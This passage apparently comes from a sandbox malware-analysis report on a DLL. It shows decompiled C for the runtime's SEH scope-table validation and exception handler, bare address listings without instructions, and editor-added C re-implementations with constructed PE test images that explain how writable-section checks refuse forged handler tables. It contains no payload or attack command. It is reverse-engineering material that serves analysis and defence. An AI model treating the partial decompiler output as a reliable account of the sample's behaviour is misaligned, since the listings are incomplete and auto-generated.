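    if ((mbi_protect & WRITABLE_PROTECT) == 0) return 1;   /* page itself not writable: accept */
    if (rd16(image_base) != 0x5a4d) return -1;             /* 'MZ' */
    const uint8_t *nt = image_base + rd32(image_base + 0x3c);
    if (rd32(nt) != 0x4550) return -1;                     /* 'PE\0\0' */
    if (rd16(nt + 0x18) != 0x10b) return -1;               /* OptionalHeader.Magic: PE32 only */
    uint16_t nsect = rd16(nt + 6);                         /* FileHeader.NumberOfSections */
    if (nsect == 0 || nsect > 0x7fff) return -1;           /* the sample tests it as a signed short */
    const uint8_t *sect = nt + 0x18 + rd16(nt + 0x14);     /* first IMAGE_SECTION_HEADER */
    /* The decompiled function looks at the first section header only; this
     * example walks all of them. */
    for (uint16_t i = 0; i < nsect; i++, sect += SECTION_HEADER_SIZE) {
        uint32_t va = rd32(sect + 0xc);                    /* VirtualAddress */
        uint32_t vsize = rd32(sect + 0x8);                 /* Misc.VirtualSize */
        if (ptr_rva < va || ptr_rva >= va + vsize) continue;
        return (rd32(sect + 0x24) & IMAGE_SCN_MEM_WRITE) ? 0 : 1;   /* Characteristics */
    }
    return 1;                                              /* in no section: accepted, as in the sample */
}

/* Constructed fixture: minimal PE32 headers with .text (RX, RVA 0x1000) and
 * .data (RW, RVA 0x2000), 0x1000 bytes each. Returns bytes written, 0 on error. */
size_t build_test_image(uint8_t *buf, size_t cap)
{
    const uint32_t nt_off = 0x80, opt_size = 0xe0;         /* PE32 optional header size */
    if (cap < nt_off + 0x18 + opt_size + 2 * SECTION_HEADER_SIZE) return 0;
    memset(buf, 0, cap);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3c, nt_off);                              /* e_lfanew */
    uint8_t *nt = buf + nt_off;
    nt[0] = 'P'; nt[1] = 'E';
    nt[6] = 2;                                             /* NumberOfSections */
    nt[0x14] = (uint8_t)opt_size;                          /* SizeOfOptionalHeader */
    nt[0x18] = 0x0b; nt[0x19] = 0x01;                      /* Magic 0x10b */
    uint8_t *s = nt + 0x18 + opt_size;
    memcpy(s, ".text", 5); wr32(s + 0x8, 0x1000); wr32(s + 0xc, 0x1000); wr32(s + 0x24, 0x60000020);
    s += SECTION_HEADER_SIZE;
    memcpy(s, ".data", 5); wr32(s + 0x8, 0x1000); wr32(s + 0xc, 0x2000); wr32(s + 0x24, 0xc0000040);
    return nt_off + 0x18 + opt_size + 2 * SECTION_HEADER_SIZE;
}

/* Validate one (rva, Type, Protect) triple against the fixture image. */
int check_against_fixture(uint32_t rva, uint32_t mbi_type, uint32_t mbi_protect)
{
    uint8_t img[512];
    if (build_test_image(img, sizeof img) == 0) return -2;
    return validate_ptr_in_image(img, rva, mbi_type, mbi_protect);
}

int main(void)
{
    printf("rva 0x1010, RWX page, .text section : %d\n", check_against_fixture(0x1010, MEM_IMAGE, 0x40));
    printf("rva 0x2010, RW page, .data section  : %d\n", check_against_fixture(0x2010, MEM_IMAGE, 0x04));
    printf("rva 0x2010, read-only page          : %d\n", check_against_fixture(0x2010, MEM_IMAGE, 0x02));
    printf("rva 0x2010, MEM_PRIVATE region      : %d\n", check_against_fixture(0x2010, 0x20000, 0x04));
    return 0;
}
```

The ordering of the tests is the security-relevant part: the page protection is consulted first, and the section characteristics only decide the case where the page is writable, so a handler or scope table that an attacker has written into a RW data section is refused while one in a read-only or execute-only mapping is accepted without parsing anything.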
                                      0x00fab173
                                      0x00fab176
                                       (Address column of the disassembly listing for the routine at 0x00FAB17C, covering 0x00FAB17C through 0x00FAB386; the instruction text beside these addresses was not captured in this extraction.)

                                      APIs
                                      • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00FAB21A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: MemoryQueryVirtual
                                      • String ID:
                                      • API String ID: 2850889275-0
                                      • Opcode ID: 5d2eee7bf11a2412b52b7cb9b72acbbc0cf820f4d5b1bbfa0392bb3c2f183acc
                                      • Instruction ID: 37ac10e7dc0f72fbe7b2591689334624c1388c3fb115da31e0db26fc93ae3f28
                                      • Opcode Fuzzy Hash: 5d2eee7bf11a2412b52b7cb9b72acbbc0cf820f4d5b1bbfa0392bb3c2f183acc
                                      • Instruction Fuzzy Hash: 8961BFB1A006069BDF1ACF69D89076973E5EB87324F24852AD806C7692E731EC81F650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E100023C5(long _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				short* _v32;
                                      				void _v36;
                                      				void* _t57;
                                      				signed int _t58;
                                      				signed int _t61;
                                      				signed int _t62;
                                      				void* _t63;
                                      				signed int* _t68;
                                      				intOrPtr* _t69;
                                      				intOrPtr* _t71;
                                      				intOrPtr _t72;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				signed int _t77;
                                      				void* _t78;
                                      				void _t80;
                                      				signed int _t81;
                                      				signed int _t84;
                                      				signed int _t86;
                                      				short* _t87;
                                      				void* _t89;
                                      				signed int* _t90;
                                      				long _t91;
                                      				signed int _t93;
                                      				signed int _t94;
                                      				signed int _t100;
                                      				signed int _t102;
                                      				void* _t104;
                                      				long _t108;
                                      				signed int _t110;
                                      
                                       				_t108 = _a4;                                  // registration record: +8 scope table, +0xc try level (EH3 layout)
                                       				_t76 =  *(_t108 + 8);                         // scope-table pointer
                                       				if((_t76 & 0x00000003) != 0) {                // reject a table that is not 4-byte aligned
                                      					L3:
                                      					return 0;
                                      				}
                                       				_a4 =  *[fs:0x4];                             // TEB StackBase
                                       				_v8 =  *[fs:0x8];                             // TEB StackLimit
                                       				if(_t76 < _v8 || _t76 >= _a4) {               // table must lie outside the stack; otherwise L3 returns 0
                                      					_t102 =  *(_t108 + 0xc);
                                      					__eflags = _t102 - 0xffffffff;
                                      					if(_t102 != 0xffffffff) {
                                      						_t91 = 0;
                                      						__eflags = 0;
                                      						_a4 = 0;
                                      						_t57 = _t76;
                                      						do {
                                      							_t80 =  *_t57;
                                      							__eflags = _t80 - 0xffffffff;
                                      							if(_t80 == 0xffffffff) {
                                      								goto L9;
                                      							}
                                      							__eflags = _t80 - _t91;
                                      							if(_t80 >= _t91) {
                                      								L20:
                                      								_t63 = 0;
                                      								L60:
                                      								return _t63;
                                      							}
                                      							L9:
                                      							__eflags =  *(_t57 + 4);
                                      							if( *(_t57 + 4) != 0) {
                                      								_t12 =  &_a4;
                                      								 *_t12 = _a4 + 1;
                                      								__eflags =  *_t12;
                                      							}
                                      							_t91 = _t91 + 1;
                                      							_t57 = _t57 + 0xc;
                                      							__eflags = _t91 - _t102;
                                      						} while (_t91 <= _t102);
                                      						__eflags = _a4;
                                      						if(_a4 == 0) {
                                      							L15:
                                       							_t81 =  *0x10004178;                  // count of cached already-validated pages (at most 16)
                                       							_t110 = _t76 & 0xfffff000;            // page that holds the scope table
                                      							_t58 = 0;
                                      							__eflags = _t81;
                                      							if(_t81 <= 0) {
                                      								L18:
                                       								_t104 = _t102 | 0xffffffff;           // -1: current-process handle
                                       								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4); // MemoryBasicInformation (class 0), 28-byte buffer
                                      								__eflags = _t61;
                                      								if(_t61 < 0) {
                                      									_t62 = 0;
                                      									__eflags = 0;
                                      								} else {
                                      									_t62 = _a4;
                                      								}
                                      								__eflags = _t62;
                                      								if(_t62 == 0) {
                                      									L59:
                                      									_t63 = _t104;
                                      									goto L60;
                                      								} else {
                                       									__eflags = _v12 - 0x1000000;
                                       									if(_v12 != 0x1000000) {              // MEMORY_BASIC_INFORMATION.Type must be MEM_IMAGE
                                       										goto L59;
                                       									}
                                       									__eflags = _v16 & 0x000000cc;
                                       									if((_v16 & 0x000000cc) == 0) {       // Protect has no writable bit: accept and cache the page (L46)
                                      										L46:
                                      										_t63 = 1;
                                       										 *0x100041c0 = 1;                   // busy flag guarding the page cache
                                      										__eflags =  *0x100041c0;
                                      										if( *0x100041c0 != 0) {
                                      											goto L60;
                                      										}
                                      										_t84 =  *0x10004178;
                                      										__eflags = _t84;
                                      										_t93 = _t84;
                                      										if(_t84 <= 0) {
                                      											L51:
                                      											__eflags = _t93;
                                      											if(_t93 != 0) {
                                      												L58:
                                      												 *0x100041c0 = 0;
                                      												goto L5;
                                      											}
                                      											_t77 = 0xf;
                                      											__eflags = _t84 - _t77;
                                      											if(_t84 <= _t77) {
                                      												_t77 = _t84;
                                      											}
                                      											_t94 = 0;
                                      											__eflags = _t77;
                                      											if(_t77 < 0) {
                                      												L56:
                                      												__eflags = _t84 - 0x10;
                                      												if(_t84 < 0x10) {
                                      													_t86 = _t84 + 1;
                                      													__eflags = _t86;
                                      													 *0x10004178 = _t86;
                                      												}
                                      												goto L58;
                                      											} else {
                                      												do {
                                      													_t68 = 0x10004180 + _t94 * 4;
                                      													_t94 = _t94 + 1;
                                      													__eflags = _t94 - _t77;
                                      													 *_t68 = _t110;
                                      													_t110 =  *_t68;
                                      												} while (_t94 <= _t77);
                                      												goto L56;
                                      											}
                                      										}
                                      										_t69 = 0x1000417c + _t84 * 4;
                                      										while(1) {
                                      											__eflags =  *_t69 - _t110;
                                      											if( *_t69 == _t110) {
                                      												goto L51;
                                      											}
                                      											_t93 = _t93 - 1;
                                      											_t69 = _t69 - 4;
                                      											__eflags = _t93;
                                      											if(_t93 > 0) {
                                      												continue;
                                      											}
                                      											goto L51;
                                      										}
                                      										goto L51;
                                      									}
                                       									_t87 = _v32;                         // AllocationBase: start of the mapped image
                                       									__eflags =  *_t87 - 0x5a4d;
                                       									if( *_t87 != 0x5a4d) {               // 'MZ'
                                       										goto L59;
                                       									}
                                       									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;   // e_lfanew -> IMAGE_NT_HEADERS
                                       									__eflags =  *_t71 - 0x4550;
                                       									if( *_t71 != 0x4550) {               // 'PE\0\0'
                                       										goto L59;
                                       									}
                                       									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                       									if( *((short*)(_t71 + 0x18)) != 0x10b) {   // optional-header magic must be PE32
                                       										goto L59;
                                       									}
                                       									_t78 = _t76 - _t87;                  // RVA of the scope table within the image
                                       									__eflags =  *((short*)(_t71 + 6));   // NumberOfSections
                                       									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;   // first section header = optional header + SizeOfOptionalHeader
                                       									if( *((short*)(_t71 + 6)) <= 0) {
                                       										goto L59;
                                       									}
                                       									_t72 =  *((intOrPtr*)(_t89 + 0xc));  // section VirtualAddress
                                       									__eflags = _t78 - _t72;
                                       									if(_t78 < _t72) {                    // table below the section: accept (L46)
                                       										goto L46;
                                       									}
                                       									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;   // VirtualAddress + VirtualSize
                                       									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {   // table past the section: accept (L46)
                                       										goto L46;
                                       									}
                                       									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                       									if(( *(_t89 + 0x27) & 0x00000080) != 0) {   // section Characteristics has IMAGE_SCN_MEM_WRITE: reject (L20 returns 0)
                                      										goto L20;
                                      									}
                                      									goto L46;
                                      								}
                                      							} else {
                                      								goto L16;
                                      							}
                                      							while(1) {
                                      								L16:
                                      								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 + 1;
                                      								__eflags = _t58 - _t81;
                                      								if(_t58 < _t81) {
                                      									continue;
                                      								}
                                      								goto L18;
                                      							}
                                      							__eflags = _t58;
                                      							if(_t58 <= 0) {
                                      								goto L5;
                                      							}
                                      							 *0x100041c0 = 1;
                                      							__eflags =  *0x100041c0;
                                      							if( *0x100041c0 != 0) {
                                      								goto L5;
                                      							}
                                      							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                      							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                      								L32:
                                      								_t100 = 0;
                                      								__eflags = _t58;
                                      								if(_t58 < 0) {
                                      									L34:
                                      									 *0x100041c0 = 0;
                                      									goto L5;
                                      								} else {
                                      									goto L33;
                                      								}
                                      								do {
                                      									L33:
                                      									_t90 = 0x10004180 + _t100 * 4;
                                      									_t100 = _t100 + 1;
                                      									__eflags = _t100 - _t58;
                                      									 *_t90 = _t110;
                                      									_t110 =  *_t90;
                                      								} while (_t100 <= _t58);
                                      								goto L34;
                                      							}
                                      							_t58 = _t81 - 1;
                                      							__eflags = _t58;
                                      							if(_t58 < 0) {
                                      								L28:
                                      								__eflags = _t81 - 0x10;
                                      								if(_t81 < 0x10) {
                                      									_t81 = _t81 + 1;
                                      									__eflags = _t81;
                                      									 *0x10004178 = _t81;
                                      								}
                                      								_t58 = _t81 - 1;
                                      								goto L32;
                                      							} else {
                                      								goto L25;
                                      							}
                                      							while(1) {
                                      								L25:
                                      								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 - 1;
                                      								__eflags = _t58;
                                      								if(_t58 >= 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							__eflags = _t58;
                                      							if(__eflags >= 0) {
                                      								if(__eflags == 0) {
                                      									goto L34;
                                      								}
                                      								goto L32;
                                      							}
                                      							goto L28;
                                      						}
                                      						_t75 =  *((intOrPtr*)(_t108 - 8));
                                      						__eflags = _t75 - _v8;
                                      						if(_t75 < _v8) {
                                      							goto L20;
                                      						}
                                      						__eflags = _t75 - _t108;
                                      						if(_t75 >= _t108) {
                                      							goto L20;
                                      						}
                                      						goto L15;
                                      					}
                                      					L5:
                                      					_t63 = 1;
                                      					goto L60;
                                      				} else {
                                      					goto L3;
                                      				}
                                      			}
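                                       The routine above has the shape of the MSVC C runtime's SEH3 scope-table validation: it rejects a scope table that is misaligned or that sits on the stack (between fs:[8] StackLimit and fs:[4] StackBase), walks the 12-byte entries up to the current try level checking that every enclosing level points outward, asks NtQueryVirtualMemory for MemoryBasicInformation and insists on MEM_IMAGE, and, when the page is writable, parses the MZ/PE headers to reject a table that lives in an IMAGE_SCN_MEM_WRITE section. The following is an added, editor-written C example that re-implements those checks portably so they can be read and exercised offline; it is not code from 2e.dll, from the MSVC runtime, or from the Joe Sandbox report. The TEB stack bounds and the memory-region facts are passed in as parameters instead of being read from fs: or queried, the 16-entry cache of validated pages that the listing keeps at 0x10004178/0x10004180 (with the busy flag at 0x100041c0) is omitted, the listing tests the first section header only whereas this example applies the same test to every section header, and all names (scope_entry, region_info, validate_scope_table, the check_* scenarios) and the constructed in-memory PE image are assumptions.

```c
/* Added example (editor-written; not code from 2e.dll or from the sandbox report): the checks the
 * decompiled E100023C5 applies to a 32-bit SEH3 scope table, re-implemented portably. TEB stack
 * bounds and NtQueryVirtualMemory results are passed in as parameters; names are assumptions. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#define MEM_IMAGE          0x1000000u  /* MEMORY_BASIC_INFORMATION.Type the listing requires */
#define PAGE_WRITABLE_MASK 0xccu       /* READWRITE|WRITECOPY|EXECUTE_READWRITE|EXECUTE_WRITECOPY */
#define PAGE_READONLY      0x02u
#define PAGE_READWRITE     0x04u
#define SCN_MEM_WRITE      0x80000000u /* the listing tests byte +0x27 of the section header & 0x80 */
struct scope_entry { int32_t enclosing_level; uint32_t filter, handler; };   /* 12-byte entry */
#pragma pack(push, 1)
struct dos_hdr { uint16_t e_magic; uint8_t pad[58]; uint32_t e_lfanew; };  /* e_lfanew at +0x3c */
struct nt_hdr  { uint32_t signature; uint16_t machine; int16_t number_of_sections; uint32_t pad[3];
                 uint16_t size_of_optional, characteristics; uint16_t magic; }; /* magic at +0x18 */
struct section_hdr { char name[8]; uint32_t virtual_size, virtual_address; uint8_t pad[0x14];
                     uint32_t characteristics; };                              /* 40 bytes */
#pragma pack(pop)
struct region_info { const uint8_t *allocation_base; uint32_t type, protect; }; /* MemoryBasicInformation facts */

/* Same verdict as E100023C5: 1 = accept the scope table, 0 = reject. The listing tests the first
 * section header only; this version applies that test to every section header. */
int validate_scope_table(const struct scope_entry *table, int32_t try_level, uintptr_t stack_lo,
                         uintptr_t stack_hi, uintptr_t saved_esp, uintptr_t reg, const struct region_info *ri)
{
    uintptr_t tp = (uintptr_t)table;
    if (tp & 3) return 0;                                  /* not 4-byte aligned */
    if (tp >= stack_lo && tp < stack_hi) return 0;         /* table lives on the stack */
    if (try_level == -1) return 1;                         /* no active try level: nothing to walk */
    int filters = 0;
    for (int32_t i = 0; i <= try_level; i++) {
        int32_t enc = table[i].enclosing_level;
        if (enc != -1 && enc >= i) return 0;               /* enclosing level must point outward */
        if (table[i].filter) filters++;
    }
    if (filters && (saved_esp < stack_lo || saved_esp >= reg)) return 0; /* saved ESP off the stack */
    if (ri->type != MEM_IMAGE) return 0;                   /* table must be inside a mapped image */
    if ((ri->protect & PAGE_WRITABLE_MASK) == 0) return 1; /* read-only page: accepted as is */
    /* Writable page: parse the image and reject a table inside an IMAGE_SCN_MEM_WRITE section. */
    const uint8_t *base = ri->allocation_base;
    const struct dos_hdr *dos = (const struct dos_hdr *)base;
    if (dos->e_magic != 0x5a4d) return 0;                  /* 'MZ' */
    const struct nt_hdr *nt = (const struct nt_hdr *)(base + dos->e_lfanew);
    if (nt->signature != 0x4550 || nt->magic != 0x10b || nt->number_of_sections <= 0) return 0;
    uint32_t rva = (uint32_t)(tp - (uintptr_t)base);
    const struct section_hdr *sec = (const struct section_hdr *)((const uint8_t *)nt + 0x18 + nt->size_of_optional);
    for (int16_t s = 0; s < nt->number_of_sections; s++)
        if (rva >= sec[s].virtual_address && rva < sec[s].virtual_address + sec[s].virtual_size)
            return (sec[s].characteristics & SCN_MEM_WRITE) ? 0 : 1;
    return 1;
}

/* Constructed PE32 image, not a real binary: .rdata at RVA 0x200 (read-only) and .data at RVA 0x300
 * (writable) each hold a two-level scope table; a malformed table sits at RVA 0x220. */
static union { uint8_t b[0x400]; uint32_t align; } g_img;
#define g_image g_img.b
static struct scope_entry *build_image(void)
{
    memset(g_image, 0, sizeof g_image);
    struct dos_hdr *dos = (struct dos_hdr *)g_image;
    dos->e_magic = 0x5a4d; dos->e_lfanew = 0x40;
    struct nt_hdr *nt = (struct nt_hdr *)(g_image + 0x40);
    nt->signature = 0x4550; nt->number_of_sections = 2; nt->size_of_optional = 0xe0; nt->magic = 0x10b;
    struct section_hdr *sec = (struct section_hdr *)(g_image + 0x40 + 0x18 + 0xe0);
    memcpy(sec[0].name, ".rdata", 6); sec[0].virtual_address = 0x200; sec[0].virtual_size = 0x100;
    sec[0].characteristics = 0x40000040u;                  /* MEM_READ | CNT_INITIALIZED_DATA */
    memcpy(sec[1].name, ".data", 5);  sec[1].virtual_address = 0x300; sec[1].virtual_size = 0x100;
    sec[1].characteristics = 0xC0000040u;                  /* MEM_READ | MEM_WRITE | CNT_INITIALIZED_DATA */
    struct scope_entry t[2] = { { -1, 0x1000, 0x1010 }, { 0, 0x1020, 0x1030 } };
    memcpy(g_image + 0x200, t, sizeof t);                  /* well-formed table in .rdata */
    memcpy(g_image + 0x300, t, sizeof t);                  /* same table in writable .data */
    t[1].enclosing_level = 1;                              /* an entry that encloses itself: malformed */
    memcpy(g_image + 0x220, t, sizeof t);
    return (struct scope_entry *)(g_image + 0x200);
}

/* One scenario: synthetic stack bounds placed around the table (on_stack) or well above it. */
static int run(const void *table, int32_t level, int on_stack, uint32_t protect)
{
    uintptr_t tp = (uintptr_t)table;
    uintptr_t lo = on_stack ? tp - 0x100 : tp + 0x10000, hi = lo + 0x10000;
    struct region_info ri = { g_image, MEM_IMAGE, protect };
    return validate_scope_table(table, level, lo, hi, lo + 0x100, lo + 0x200, &ri);
}
int check_readonly_section(void)    { return run(build_image(), 1, 0, PAGE_READWRITE); }                 /* 1 */
int check_writable_section(void)    { build_image(); return run(g_image + 0x300, 1, 0, PAGE_READWRITE); } /* 0 */
int check_readonly_page(void)       { build_image(); return run(g_image + 0x300, 1, 0, PAGE_READONLY); }  /* 1 */
int check_misaligned(void)          { return run((uint8_t *)build_image() + 2, 1, 0, PAGE_READWRITE); }   /* 0 */
int check_on_stack(void)            { return run(build_image(), 1, 1, PAGE_READWRITE); }                 /* 0 */
int check_bad_enclosing_level(void) { build_image(); return run(g_image + 0x220, 1, 0, PAGE_READWRITE); } /* 0 */
int check_no_active_try(void)       { build_image(); return run(g_image + 0x300, -1, 0, PAGE_READWRITE); }/* 1 */

int main(void)
{
    int (*checks[])(void) = { check_readonly_section, check_writable_section, check_readonly_page, check_misaligned, check_on_stack, check_bad_enclosing_level, check_no_active_try };
    for (unsigned i = 0; i < sizeof checks / sizeof *checks; i++) printf("check %u -> %d\n", i, checks[i]());
    return 0;
}
```

                                       Each check_* function returns the verdict for one scenario in the same order of tests as the listing: a table in .data on a page reported PAGE_READWRITE is rejected because the section is IMAGE_SCN_MEM_WRITE, while the very same table on a page reported PAGE_READONLY is accepted without the image ever being parsed, since the Protect test comes first. The stack-bounds, alignment and enclosing-level checks run before any memory query, which is why they need no region_info to fail.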

                                       (Address column of the disassembly listing for E100023C5, beginning at 0x100023CF; the instruction text beside these addresses was not captured in this extraction.)
                                      0x1000247d
                                      0x100024fb
                                      0x100024fb
                                      0x1000247f
                                      0x1000247f
                                      0x1000247f
                                      0x100024fd
                                      0x100024ff
                                      0x100025e0
                                      0x100025e0
                                      0x00000000
                                      0x10002505
                                      0x10002505
                                      0x1000250c
                                      0x00000000
                                      0x00000000
                                      0x10002512
                                      0x10002516
                                      0x10002572
                                      0x10002574
                                      0x1000257c
                                      0x1000257e
                                      0x10002580
                                      0x00000000
                                      0x00000000
                                      0x10002582
                                      0x10002588
                                      0x1000258a
                                      0x1000258c
                                      0x100025a1
                                      0x100025a1
                                      0x100025a3
                                      0x100025d2
                                      0x100025d9
                                      0x00000000
                                      0x100025d9
                                      0x100025a7
                                      0x100025a8
                                      0x100025aa
                                      0x100025ac
                                      0x100025ac
                                      0x100025ae
                                      0x100025b0
                                      0x100025b2
                                      0x100025c6
                                      0x100025c6
                                      0x100025c9
                                      0x100025cb
                                      0x100025cb
                                      0x100025cc
                                      0x100025cc
                                      0x00000000
                                      0x100025b4
                                      0x100025b4
                                      0x100025b4
                                      0x100025bd
                                      0x100025be
                                      0x100025c0
                                      0x100025c2
                                      0x100025c2
                                      0x00000000
                                      0x100025b4
                                      0x100025b2
                                      0x1000258e
                                      0x10002595
                                      0x10002595
                                      0x10002597
                                      0x00000000
                                      0x00000000
                                      0x10002599
                                      0x1000259a
                                      0x1000259d
                                      0x1000259f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x1000259f
                                      0x00000000
                                      0x10002595
                                      0x10002518
                                      0x1000251b
                                      0x10002520
                                      0x00000000
                                      0x00000000
                                      0x10002529
                                      0x1000252b
                                      0x10002531
                                      0x00000000
                                      0x00000000
                                      0x10002537
                                      0x1000253d
                                      0x00000000
                                      0x00000000
                                      0x10002543
                                      0x10002545
                                      0x1000254e
                                      0x10002552
                                      0x00000000
                                      0x00000000
                                      0x10002558
                                      0x1000255b
                                      0x1000255d
                                      0x00000000
                                      0x00000000
                                      0x10002564
                                      0x10002566
                                      0x00000000
                                      0x00000000
                                      0x10002568
                                      0x1000256c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x1000256c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x10002457
                                      0x10002457
                                      0x10002457
                                      0x1000245e
                                      0x00000000
                                      0x00000000
                                      0x10002460
                                      0x10002461
                                      0x10002463
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x10002463
                                      0x1000248b
                                      0x1000248d
                                      0x00000000
                                      0x00000000
                                      0x1000249d
                                      0x1000249f
                                      0x100024a1
                                      0x00000000
                                      0x00000000
                                      0x100024a7
                                      0x100024ae
                                      0x100024da
                                      0x100024da
                                      0x100024dc
                                      0x100024de
                                      0x100024f2
                                      0x100024f4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x100024e0
                                      0x100024e0
                                      0x100024e0
                                      0x100024e9
                                      0x100024ea
                                      0x100024ec
                                      0x100024ee
                                      0x100024ee
                                      0x00000000
                                      0x100024e0
                                      0x100024b0
                                      0x100024b3
                                      0x100024b5
                                      0x100024c7
                                      0x100024c7
                                      0x100024ca
                                      0x100024cc
                                      0x100024cc
                                      0x100024cd
                                      0x100024cd
                                      0x100024d3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x100024b7
                                      0x100024b7
                                      0x100024b7
                                      0x100024be
                                      0x00000000
                                      0x00000000
                                      0x100024c0
                                      0x100024c0
                                      0x100024c1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x100024c1
                                      0x100024c3
                                      0x100024c5
                                      0x100024d8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x100024d8
                                      0x00000000
                                      0x100024c5
                                      0x10002437
                                      0x1000243a
                                      0x1000243d
                                      0x00000000
                                      0x00000000
                                      0x1000243f
                                      0x10002441
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x10002441
                                      0x10002406
                                      0x10002408
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002476
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: MemoryQueryVirtual
                                      • String ID:
                                      • API String ID: 2850889275-0
                                      • Opcode ID: 75796e37ffc40df8b07d760eb0f82abd4fd6d8346141c8c85dd3289551cfb3a3
                                      • Instruction ID: 565bfe824334cf735712f2556b3512e5c3dd88f08f5da091b28bd90529fb40d8
                                      • Opcode Fuzzy Hash: 75796e37ffc40df8b07d760eb0f82abd4fd6d8346141c8c85dd3289551cfb3a3
                                      • Instruction Fuzzy Hash: 6861FC70A00A568FFB59CF28CCE066937E5EB893D5F228139D846C729DEB30DD82C654
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 71%
                                      			E00FAAF44(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				void* __ebp;
                                      				signed int* _t43;
                                      				char _t44;
                                      				void* _t46;
                                      				void* _t49;
                                      				intOrPtr* _t53;
                                      				void* _t54;
                                      				void* _t65;
                                      				long _t66;
                                      				signed int* _t80;
                                      				signed int* _t82;
                                      				void* _t84;
                                      				signed int _t86;
                                      				void* _t89;
                                      				void* _t95;
                                      				void* _t96;
                                      				void* _t99;
                                      				void* _t106;
                                      
                                      				_t43 = _t84;
                                      				_t65 = __ebx + 2;
                                      				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                      				_t89 = _t95;
                                      				_t96 = _t95 - 8;
                                      				_push(_t65);
                                      				_push(_t84);
                                      				_push(_t89);
                                      				asm("cld");
                                      				_t66 = _a8;
                                      				_t44 = _a4;
                                      				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                      					_push(_t89);
                                      					E00FAB0AF(_t66 + 0x10, _t66, 0xffffffff);
                                      					_t46 = 1;
                                      				} else {
                                      					_v12 = _t44;
                                      					_v8 = _a12;
                                      					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                      					_t86 =  *(_t66 + 0xc);
                                      					_t80 =  *(_t66 + 8);
                                      					_t49 = E00FAB169(_t66);
                                      					_t99 = _t96 + 4;
                                      					if(_t49 == 0) {
                                      						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                      						goto L11;
                                      					} else {
                                      						while(_t86 != 0xffffffff) {
                                      							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                      							if(_t53 == 0) {
                                      								L8:
                                      								_t80 =  *(_t66 + 8);
                                      								_t86 = _t80[_t86 + _t86 * 2];
                                      								continue;
                                      							} else {
                                      								_t54 =  *_t53();
                                      								_t89 = _t89;
                                      								_t86 = _t86;
                                      								_t66 = _a8;
                                      								_t55 = _t54;
                                      								_t106 = _t54;
                                      								if(_t106 == 0) {
                                      									goto L8;
                                      								} else {
                                      									if(_t106 < 0) {
                                      										_t46 = 0;
                                      									} else {
                                      										_t82 =  *(_t66 + 8);
                                      										E00FAB054(_t55, _t66);
                                      										_t89 = _t66 + 0x10;
                                      										E00FAB0AF(_t89, _t66, 0);
                                      										_t99 = _t99 + 0xc;
                                      										E00FAB14B(_t82[2]);
                                      										 *(_t66 + 0xc) =  *_t82;
                                      										_t66 = 0;
                                      										_t86 = 0;
                                      										 *(_t82[2])(1);
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      							goto L13;
                                      						}
                                      						L11:
                                      						_t46 = 1;
                                      					}
                                      				}
                                      				L13:
                                      				return _t46;
                                       			}

                                      0x00faaf48
                                      0x00faaf49
                                      0x00faaf4a
                                      0x00faaf4d
